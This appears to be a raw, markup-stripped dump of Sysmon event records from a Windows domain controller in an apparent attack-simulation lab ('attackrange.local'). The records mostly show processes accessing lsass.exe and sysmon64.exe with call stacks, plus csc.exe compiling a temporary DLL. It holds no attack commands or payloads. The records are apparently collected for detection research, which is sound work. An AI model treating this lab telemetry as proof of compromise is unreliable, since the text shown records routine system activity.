08:40:25.712{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.712{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.712{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localDLL2020-10-12 08:40:25.665{5D479F2C-1679-5F84-0403-000000007E01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\taervu2d.dll2020-10-12 08:40:25.571 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1679-5F84-0503-000000007E01}3960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1679-5F84-0503-000000007E01}3960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.665{5D479F2C-1679-5F84-0403-000000007E01}41164488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{5D479F2C-1679-5F84-0503-000000007E01}3960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.666{5D479F2C-1679-5F84-0503-000000007E01}3960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD8B4.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCF0C11AC87572495F965A54CDE7136DA1.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{5D479F2C-1679-5F84-0403-000000007E01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\taervu2d.cmdline" 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1679-5F84-0403-000000007E01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 